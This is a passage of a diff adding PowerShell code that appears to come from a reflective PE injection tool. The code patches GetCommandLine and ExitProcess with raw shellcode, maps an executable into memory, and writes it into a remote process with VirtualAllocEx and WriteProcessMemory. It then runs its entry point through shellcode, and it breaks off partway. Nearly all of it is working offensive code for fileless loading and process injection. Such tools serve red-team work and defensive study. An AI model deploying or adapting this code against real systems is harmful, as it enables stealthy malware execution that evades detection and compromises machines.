+ #Make copy of GetCommandLineA and GetCommandLineW
2085
+ $GetCommandLineAOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
2086
+ $GetCommandLineWOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
2087
+ $Win32Functions.memcpy.Invoke($GetCommandLineAOrigBytesPtr, $GetCommandLineAAddr, [UInt64]$TotalSize) | Out-Null
2088
+ $Win32Functions.memcpy.Invoke($GetCommandLineWOrigBytesPtr, $GetCommandLineWAddr, [UInt64]$TotalSize) | Out-Null
2089
+ $ReturnArray += ,($GetCommandLineAAddr, $GetCommandLineAOrigBytesPtr, $TotalSize)
2090
+ $ReturnArray += ,($GetCommandLineWAddr, $GetCommandLineWOrigBytesPtr, $TotalSize)
2091
+
2092
+ #Overwrite GetCommandLineA
2093
+ [UInt32]$OldProtectFlag = 0
2094
+ $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
2095
+ if ($Success = $false)
2096
+ {
2097
+ throw "Call to VirtualProtect failed"
2098
+ }
2099
+
2100
+ $GetCommandLineAAddrTemp = $GetCommandLineAAddr
2101
+ Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineAAddrTemp
2102
+ $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)
2103
+ [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false)
2104
+ $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp $PtrSize
2105
+ Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineAAddrTemp
2106
+
2107
+ $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
2108
+
2109
+
2110
+ #Overwrite GetCommandLineW
2111
+ [UInt32]$OldProtectFlag = 0
2112
+ $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
2113
+ if ($Success = $false)
2114
+ {
2115
+ throw "Call to VirtualProtect failed"
2116
+ }
2117
+
2118
+ $GetCommandLineWAddrTemp = $GetCommandLineWAddr
2119
+ Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
2120
+ $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp ($Shellcode1.Length)
2121
+ [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineWArgsPtr, $GetCommandLineWAddrTemp, $false)
2122
+ $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp $PtrSize
2123
+ Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp
2124
+
2125
+ $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
2126
+ #################################################
2127
+
2128
+
2129
+ #################################################
2130
+ #For C++ stuff that is compiled with visual studio as "multithreaded DLL", the above method of overwriting GetCommandLine doesn't work.
2131
+ # I don't know why exactly.. But the msvcr DLL that a "DLL compiled executable" imports has an export called _acmdln and _wcmdln.
2132
+ # It appears to call GetCommandLine and store the result in this var. Then when you call __wgetcmdln it parses and returns the
2133
+ # argv and argc values stored in these variables. So the easy thing to do is just overwrite the variable since they are exported.
2134
+ $DllList = @("msvcr70d.dll", "msvcr71d.dll", "msvcr80d.dll", "msvcr90d.dll", "msvcr100d.dll", "msvcr110d.dll", "msvcr70.dll" `
2135
+ , "msvcr71.dll", "msvcr80.dll", "msvcr90.dll", "msvcr100.dll", "msvcr110.dll")
2136
+
2137
+ foreach ($Dll in $DllList)
2138
+ {
2139
+ [IntPtr]$DllHandle = $Win32Functions.GetModuleHandle.Invoke($Dll)
2140
+ if ($DllHandle -ne [IntPtr]::Zero)
2141
+ {
2142
+ [IntPtr]$WCmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_wcmdln")
2143
+ [IntPtr]$ACmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_acmdln")
2144
+ if ($WCmdLnAddr -eq [IntPtr]::Zero -or $ACmdLnAddr -eq [IntPtr]::Zero)
2145
+ {
2146
+ "Error, couldn't find _wcmdln or _acmdln"
2147
+ }
2148
+
2149
+ $NewACmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)
2150
+ $NewWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)
2151
+
2152
+ #Make a copy of the original char* and wchar_t* so these variables can be returned back to their original state
2153
+ $OrigACmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ACmdLnAddr, [Type][IntPtr])
2154
+ $OrigWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($WCmdLnAddr, [Type][IntPtr])
2155
+ $OrigACmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
2156
+ $OrigWCmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
2157
+ [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigACmdLnPtr, $OrigACmdLnPtrStorage, $false)
2158
+ [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigWCmdLnPtr, $OrigWCmdLnPtrStorage, $false)
2159
+ $ReturnArray += ,($ACmdLnAddr, $OrigACmdLnPtrStorage, $PtrSize)
2160
+ $ReturnArray += ,($WCmdLnAddr, $OrigWCmdLnPtrStorage, $PtrSize)
2161
+
2162
+ $Success = $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
2163
+ if ($Success = $false)
2164
+ {
2165
+ throw "Call to VirtualProtect failed"
2166
+ }
2167
+ [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewACmdLnPtr, $ACmdLnAddr, $false)
2168
+ $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null
2169
+
2170
+ $Success = $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
2171
+ if ($Success = $false)
2172
+ {
2173
+ throw "Call to VirtualProtect failed"
2174
+ }
2175
+ [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewWCmdLnPtr, $WCmdLnAddr, $false)
2176
+ $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null
2177
+ }
2178
+ }
2179
+ #################################################
2180
+
2181
+
2182
+ #################################################
2183
+ #Next overwrite CorExitProcess and ExitProcess to instead ExitThread. This way the entire Powershell process doesn't die when the EXE exits.
2184
+
2185
+ $ReturnArray = @()
2186
+ $ExitFunctions = @() #Array of functions to overwrite so the thread doesn't exit the process
2187
+
2188
+ #CorExitProcess (compiled in to visual studio c++)
2189
+ [IntPtr]$MscoreeHandle = $Win32Functions.GetModuleHandle.Invoke("mscoree.dll")
2190
+ if ($MscoreeHandle -eq [IntPtr]::Zero)
2191
+ {
2192
+ throw "mscoree handle null"
2193
+ }
2194
+ [IntPtr]$CorExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($MscoreeHandle, "CorExitProcess")
2195
+ if ($CorExitProcessAddr -eq [IntPtr]::Zero)
2196
+ {
2197
+ Throw "CorExitProcess address not found"
2198
+ }
2199
+ $ExitFunctions += $CorExitProcessAddr
2200
+
2201
+ #ExitProcess (what non-managed programs use)
2202
+ [IntPtr]$ExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitProcess")
2203
+ if ($ExitProcessAddr -eq [IntPtr]::Zero)
2204
+ {
2205
+ Throw "ExitProcess address not found"
2206
+ }
2207
+ $ExitFunctions += $ExitProcessAddr
2208
+
2209
+ [UInt32]$OldProtectFlag = 0
2210
+ foreach ($ProcExitFunctionAddr in $ExitFunctions)
2211
+ {
2212
+ $ProcExitFunctionAddrTmp = $ProcExitFunctionAddr
2213
+ #The following is the shellcode (Shellcode: ExitThread.asm):
2214
+ #32bit shellcode
2215
+ [Byte[]]$Shellcode1 = @(0xbb)
2216
+ [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)
2217
+ #64bit shellcode (Shellcode: ExitThread.asm)
2218
+ if ($PtrSize -eq 8)
2219
+ {
2220
+ [Byte[]]$Shellcode1 = @(0x48, 0xbb)
2221
+ [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)
2222
+ }
2223
+ [Byte[]]$Shellcode3 = @(0xff, 0xd3)
2224
+ $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length + $PtrSize + $Shellcode3.Length
2225
+
2226
+ [IntPtr]$ExitThreadAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitThread")
2227
+ if ($ExitThreadAddr -eq [IntPtr]::Zero)
2228
+ {
2229
+ Throw "ExitThread address not found"
2230
+ }
2231
+
2232
+ $Success = $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)
2233
+ if ($Success -eq $false)
2234
+ {
2235
+ Throw "Call to VirtualProtect failed"
2236
+ }
2237
+
2238
+ #Make copy of original ExitProcess bytes
2239
+ $ExitProcessOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
2240
+ $Win32Functions.memcpy.Invoke($ExitProcessOrigBytesPtr, $ProcExitFunctionAddr, [UInt64]$TotalSize) | Out-Null
2241
+ $ReturnArray += ,($ProcExitFunctionAddr, $ExitProcessOrigBytesPtr, $TotalSize)
2242
+
2243
+ #Write the ExitThread shellcode to memory. This shellcode will write 0x01 to ExeDoneBytePtr address (so PS knows the EXE is done), then
2244
+ # call ExitThread
2245
+ Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $ProcExitFunctionAddrTmp
2246
+ $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode1.Length)
2247
+ [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExeDoneBytePtr, $ProcExitFunctionAddrTmp, $false)
2248
+ $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize
2249
+ Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $ProcExitFunctionAddrTmp
2250
+ $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode2.Length)
2251
+ [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExitThreadAddr, $ProcExitFunctionAddrTmp, $false)
2252
+ $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize
2253
+ Write-BytesToMemory -Bytes $Shellcode3 -MemoryAddress $ProcExitFunctionAddrTmp
2254
+
2255
+ $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
2256
+ }
2257
+ #################################################
2258
+
2259
+ Write-Output $ReturnArray
2260
+ }
2261
+
2262
+
2263
+ #This function takes an array of arrays, the inner array of format @($DestAddr, $SourceAddr, $Count)
2264
+ # It copies Count bytes from Source to Destination.
2265
+ Function Copy-ArrayOfMemAddresses
2266
+ {
2267
+ Param(
2268
+ [Parameter(Position = 0, Mandatory = $true)]
2269
+ [Array[]]
2270
+ $CopyInfo,
2271
+
2272
+ [Parameter(Position = 1, Mandatory = $true)]
2273
+ [System.Object]
2274
+ $Win32Functions,
2275
+
2276
+ [Parameter(Position = 2, Mandatory = $true)]
2277
+ [System.Object]
2278
+ $Win32Constants
2279
+ )
2280
+
2281
+ [UInt32]$OldProtectFlag = 0
2282
+ foreach ($Info in $CopyInfo)
2283
+ {
2284
+ $Success = $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)
2285
+ if ($Success -eq $false)
2286
+ {
2287
+ Throw "Call to VirtualProtect failed"
2288
+ }
2289
+
2290
+ $Win32Functions.memcpy.Invoke($Info[0], $Info[1], [UInt64]$Info[2]) | Out-Null
2291
+
2292
+ $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
2293
+ }
2294
+ }
2295
+
2296
+
2297
+ #####################################
2298
+ ########## FUNCTIONS ###########
2299
+ #####################################
2300
+ Function Get-MemoryProcAddress
2301
+ {
2302
+ Param(
2303
+ [Parameter(Position = 0, Mandatory = $true)]
2304
+ [IntPtr]
2305
+ $PEHandle,
2306
+
2307
+ [Parameter(Position = 1, Mandatory = $true)]
2308
+ [String]
2309
+ $FunctionName
2310
+ )
2311
+
2312
+ $Win32Types = Get-Win32Types
2313
+ $Win32Constants = Get-Win32Constants
2314
+ $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
2315
+
2316
+ #Get the export table
2317
+ if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size -eq 0)
2318
+ {
2319
+ return [IntPtr]::Zero
2320
+ }
2321
+ $ExportTablePtr = Add-SignedIntAsUnsigned ($PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress)
2322
+ $ExportTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExportTablePtr, [Type]$Win32Types.IMAGE_EXPORT_DIRECTORY)
2323
+
2324
+ for ($i = 0; $i -lt $ExportTable.NumberOfNames; $i++)
2325
+ {
2326
+ #AddressOfNames is an array of pointers to strings of the names of the functions exported
2327
+ $NameOffsetPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNames + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))
2328
+ $NamePtr = Add-SignedIntAsUnsigned ($PEHandle) ([System.Runtime.InteropServices.Marshal]::PtrToStructure($NameOffsetPtr, [Type][UInt32]))
2329
+ $Name = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($NamePtr)
2330
+
2331
+ if ($Name -ceq $FunctionName)
2332
+ {
2333
+ #AddressOfNameOrdinals is a table which contains points to a WORD which is the index in to AddressOfFunctions
2334
+ # which contains the offset of the function in to the DLL
2335
+ $OrdinalPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNameOrdinals + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16])))
2336
+ $FuncIndex = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OrdinalPtr, [Type][UInt16])
2337
+ $FuncOffsetAddr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfFunctions + ($FuncIndex * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))
2338
+ $FuncOffset = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FuncOffsetAddr, [Type][UInt32])
2339
+ return Add-SignedIntAsUnsigned ($PEHandle) ($FuncOffset)
2340
+ }
2341
+ }
2342
+
2343
+ return [IntPtr]::Zero
2344
+ }
2345
+
2346
+
2347
+ Function Invoke-MemoryLoadLibrary
2348
+ {
2349
+ Param(
2350
+ [Parameter( Position = 0, Mandatory = $true )]
2351
+ [Byte[]]
2352
+ $PEBytes,
2353
+
2354
+ [Parameter(Position = 1, Mandatory = $false)]
2355
+ [String]
2356
+ $ExeArgs,
2357
+
2358
+ [Parameter(Position = 2, Mandatory = $false)]
2359
+ [IntPtr]
2360
+ $RemoteProcHandle,
2361
+
2362
+ [Parameter(Position = 3)]
2363
+ [Bool]
2364
+ $ForceASLR = $false
2365
+ )
2366
+
2367
+ $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
2368
+
2369
+ #Get Win32 constants and functions
2370
+ $Win32Constants = Get-Win32Constants
2371
+ $Win32Functions = Get-Win32Functions
2372
+ $Win32Types = Get-Win32Types
2373
+
2374
+ $RemoteLoading = $false
2375
+ if (($RemoteProcHandle -ne $null) -and ($RemoteProcHandle -ne [IntPtr]::Zero))
2376
+ {
2377
+ $RemoteLoading = $true
2378
+ }
2379
+
2380
+ #Get basic PE information
2381
+ Write-Verbose "Getting basic PE information from the file"
2382
+ $PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types
2383
+ $OriginalImageBase = $PEInfo.OriginalImageBase
2384
+ $NXCompatible = $true
2385
+ if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
2386
+ {
2387
+ Write-Warning "PE is not compatible with DEP, might cause issues" -WarningAction Continue
2388
+ $NXCompatible = $false
2389
+ }
2390
+
2391
+
2392
+ #Verify that the PE and the current process are the same bits (32bit or 64bit)
2393
+ $Process64Bit = $true
2394
+ if ($RemoteLoading -eq $true)
2395
+ {
2396
+ $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
2397
+ $Result = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "IsWow64Process")
2398
+ if ($Result -eq [IntPtr]::Zero)
2399
+ {
2400
+ Throw "Couldn't locate IsWow64Process function to determine if target process is 32bit or 64bit"
2401
+ }
2402
+
2403
+ [Bool]$Wow64Process = $false
2404
+ $Success = $Win32Functions.IsWow64Process.Invoke($RemoteProcHandle, [Ref]$Wow64Process)
2405
+ if ($Success -eq $false)
2406
+ {
2407
+ Throw "Call to IsWow64Process failed"
2408
+ }
2409
+
2410
+ if (($Wow64Process -eq $true) -or (($Wow64Process -eq $false) -and ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4)))
2411
+ {
2412
+ $Process64Bit = $false
2413
+ }
2414
+
2415
+ #PowerShell needs to be same bit as the PE being loaded for IntPtr to work correctly
2416
+ $PowerShell64Bit = $true
2417
+ if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)
2418
+ {
2419
+ $PowerShell64Bit = $false
2420
+ }
2421
+ if ($PowerShell64Bit -ne $Process64Bit)
2422
+ {
2423
+ throw "PowerShell must be same architecture (x86/x64) as PE being loaded and remote process"
2424
+ }
2425
+ }
2426
+ else
2427
+ {
2428
+ if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)
2429
+ {
2430
+ $Process64Bit = $false
2431
+ }
2432
+ }
2433
+ if ($Process64Bit -ne $PEInfo.PE64Bit)
2434
+ {
2435
+ Throw "PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)"
2436
+ }
2437
+
2438
+
2439
+ #Allocate memory and write the PE to memory. If the PE supports ASLR, allocate to a random memory address
2440
+ Write-Verbose "Allocating memory for the PE and write its headers to memory"
2441
+
2442
+ #ASLR check
2443
+ [IntPtr]$LoadAddr = [IntPtr]::Zero
2444
+ $PESupportsASLR = ($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -eq $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
2445
+ if ((-not $ForceASLR) -and (-not $PESupportsASLR))
2446
+ {
2447
+ Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again OR try using the -ForceASLR flag (could cause crashes)" -WarningAction Continue
2448
+ [IntPtr]$LoadAddr = $OriginalImageBase
2449
+ }
2450
+ elseif ($ForceASLR -and (-not $PESupportsASLR))
2451
+ {
2452
+ Write-Verbose "PE file doesn't support ASLR but -ForceASLR is set. Forcing ASLR on the PE file. This could result in a crash."
2453
+ }
2454
+
2455
+ if ($ForceASLR -and $RemoteLoading)
2456
+ {
2457
+ Write-Error "Cannot use ForceASLR when loading in to a remote process." -ErrorAction Stop
2458
+ }
2459
+ if ($RemoteLoading -and (-not $PESupportsASLR))
2460
+ {
2461
+ Write-Error "PE doesn't support ASLR. Cannot load a non-ASLR PE in to a remote process" -ErrorAction Stop
2462
+ }
2463
+
2464
+ $PEHandle = [IntPtr]::Zero #This is where the PE is allocated in PowerShell
2465
+ $EffectivePEHandle = [IntPtr]::Zero #This is the address the PE will be loaded to. If it is loaded in PowerShell, this equals $PEHandle. If it is loaded in a remote process, this is the address in the remote process.
2466
+ if ($RemoteLoading -eq $true)
2467
+ {
2468
+ #Allocate space in the remote process, and also allocate space in PowerShell. The PE will be setup in PowerShell and copied to the remote process when it is setup
2469
+ $PEHandle = $Win32Functions.VirtualAlloc.Invoke([IntPtr]::Zero, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
2470
+
2471
+ #todo, error handling needs to delete this memory if an error happens along the way
2472
+ $EffectivePEHandle = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, $LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
2473
+ if ($EffectivePEHandle -eq [IntPtr]::Zero)
2474
+ {
2475
+ Throw "Unable to allocate memory in the remote process. If the PE being loaded doesn't support ASLR, it could be that the requested base address of the PE is already in use"
2476
+ }
2477
+ }
2478
+ else
2479
+ {
2480
+ if ($NXCompatible -eq $true)
2481
+ {
2482
+ $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
2483
+ }
2484
+ else
2485
+ {
2486
+ $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
2487
+ }
2488
+ $EffectivePEHandle = $PEHandle
2489
+ }
2490
+
2491
+ [IntPtr]$PEEndAddress = Add-SignedIntAsUnsigned ($PEHandle) ([Int64]$PEInfo.SizeOfImage)
2492
+ if ($PEHandle -eq [IntPtr]::Zero)
2493
+ {
2494
+ Throw "VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might be free)."
2495
+ }
2496
+ [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $PEHandle, $PEInfo.SizeOfHeaders) | Out-Null
2497
+
2498
+
2499
+ #Now that the PE is in memory, get more detailed information about it
2500
+ Write-Verbose "Getting detailed PE information from the headers loaded in memory"
2501
+ $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
2502
+ $PEInfo | Add-Member -MemberType NoteProperty -Name EndAddress -Value $PEEndAddress
2503
+ $PEInfo | Add-Member -MemberType NoteProperty -Name EffectivePEHandle -Value $EffectivePEHandle
2504
+ Write-Verbose "StartAddress: $(Get-Hex $PEHandle) EndAddress: $(Get-Hex $PEEndAddress)"
2505
+
2506
+
2507
+ #Copy each section from the PE in to memory
2508
+ Write-Verbose "Copy PE sections in to memory"
2509
+ Copy-Sections -PEBytes $PEBytes -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types
2510
+
2511
+
2512
+ #Update the memory addresses hardcoded in to the PE based on the memory address the PE was expecting to be loaded to vs where it was actually loaded
2513
+ Write-Verbose "Update memory addresses based on where the PE was actually loaded in memory"
2514
+ Update-MemoryAddresses -PEInfo $PEInfo -OriginalImageBase $OriginalImageBase -Win32Constants $Win32Constants -Win32Types $Win32Types
2515
+
2516
+
2517
+ #The PE we are in-memory loading has DLLs it needs, import those DLLs for it
2518
+ Write-Verbose "Import DLL's needed by the PE we are loading"
2519
+ if ($RemoteLoading -eq $true)
2520
+ {
2521
+ Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants -RemoteProcHandle $RemoteProcHandle
2522
+ }
2523
+ else
2524
+ {
2525
+ Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants
2526
+ }
2527
+
2528
+
2529
+ #Update the memory protection flags for all the memory just allocated
2530
+ if ($RemoteLoading -eq $false)
2531
+ {
2532
+ if ($NXCompatible -eq $true)
2533
+ {
2534
+ Write-Verbose "Update memory protection flags"
2535
+ Update-MemoryProtectionFlags -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -Win32Types $Win32Types
2536
+ }
2537
+ else
2538
+ {
2539
+ Write-Verbose "PE being reflectively loaded is not compatible with NX memory, keeping memory as read write execute"
2540
+ }
2541
+ }
2542
+ else
2543
+ {
2544
+ Write-Verbose "PE being loaded in to a remote process, not adjusting memory permissions"
2545
+ }
2546
+
2547
+
2548
+ #If remote loading, copy the DLL in to remote process memory
2549
+ if ($RemoteLoading -eq $true)
2550
+ {
2551
+ [UInt32]$NumBytesWritten = 0
2552
+ $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $EffectivePEHandle, $PEHandle, [UIntPtr]($PEInfo.SizeOfImage), [Ref]$NumBytesWritten)
2553
+ if ($Success -eq $false)
2554
+ {
2555
+ Throw "Unable to write shellcode to remote process memory."
2556
+ }
2557
+ }
2558
+
2559
+
2560
+ #Call the entry point, if this is a DLL the entrypoint is the DllMain function, if it is an EXE it is the Main function
2561
+ if ($PEInfo.FileType -ieq "DLL")
2562
+ {
2563
+ if ($RemoteLoading -eq $false)
2564
+ {
2565
+ Write-Verbose "Calling dllmain so the DLL knows it has been loaded"
2566
+ $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
2567
+ $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])
2568
+ $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)
2569
+
2570
+ $DllMain.Invoke($PEInfo.PEHandle, 1, [IntPtr]::Zero) | Out-Null
2571
+ }
2572
+ else
2573
+ {
2574
+ $DllMainPtr = Add-SignedIntAsUnsigned ($EffectivePEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
2575
+
2576
+ if ($PEInfo.PE64Bit -eq $true)
2577
+ {
2578
+ #Shellcode: CallDllMain.asm
2579
+ $CallDllMainSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x66, 0x83, 0xe4, 0x00, 0x48, 0xb9)
2580
+ $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xb8)
2581
+ $CallDllMainSC3 = @(0xff, 0xd0, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
2582
+ }
2583
+ else
2584
+ {
2585
+ #Shellcode: CallDllMain.asm
2586
+ $CallDllMainSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xf0, 0xb9)
2587
+ $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x50, 0x52, 0x51, 0xb8)
2588
+ $CallDllMainSC3 = @(0xff, 0xd0, 0x89, 0xdc, 0x5b, 0xc3)
2589
+ }
2590
+ $SCLength = $CallDllMainSC1.Length + $CallDllMainSC2.Length + $CallDllMainSC3.Length + ($PtrSize * 2)
2591
+ $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
2592
+ $SCPSMemOriginal = $SCPSMem
2593
+
2594
+ Write-BytesToMemory -Bytes $CallDllMainSC1 -MemoryAddress $SCPSMem
2595
+ $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC1.Length)
2596
+ [System.Runtime.InteropServices.Marshal]::StructureToPtr($EffectivePEHandle, $SCPSMem, $false)
2597
+ $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
2598
+ Write-BytesToMemory -Bytes $CallDllMainSC2 -MemoryAddress $SCPSMem
2599
+ $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC2.Length)
2600
+ [System.Runtime.InteropServices.Marshal]::StructureToPtr($DllMainPtr, $SCPSMem, $false)
2601
+ $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
2602
+ Write-BytesToMemory -Bytes $CallDllMainSC3 -MemoryAddress $SCPSMem
2603
